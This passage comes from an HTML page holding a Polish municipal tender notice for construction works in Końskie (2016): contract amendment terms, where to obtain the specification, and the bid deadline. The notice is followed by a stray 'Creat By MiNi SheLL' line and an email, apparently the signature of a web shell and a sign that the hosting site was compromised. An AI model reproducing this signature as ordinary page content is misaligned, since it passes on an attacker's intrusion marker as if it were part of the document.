5)	Zmianie sposobu wykonania robót, inaczej niż określono w dokumentacji projektowej, o ile nie zmniejsza ich jakości i użyteczności, pod warunkiem zachowania przepisów prawa budowlanego, każda tego typu zmiana wymaga zgody Zamawiającego Wszelkie zmiany niniejszej umowy wymagają pisemnej formy aneksu pod rygorem nieważności.
2.	Wystąpienie którejkolwiek z okoliczności wymienionej w niniejszym § musi zostać wpisane w Dzienniku Budowy i potwierdzone przez Inspektora Nadzoru. 
3. 	Zmiany niniejszej umowy, o której mowa w niniejszym § oraz nieistotne zmiany umowy wymagają pisemnego aneksu pod rygorem nieważności i nie mogą być sprzeczne z postanowieniami ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych (Dz. U. z 2015r., poz. 2164).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umkonskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1 pok. 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2016 godzina 09:00, miejsce: Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1 pok. 24 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com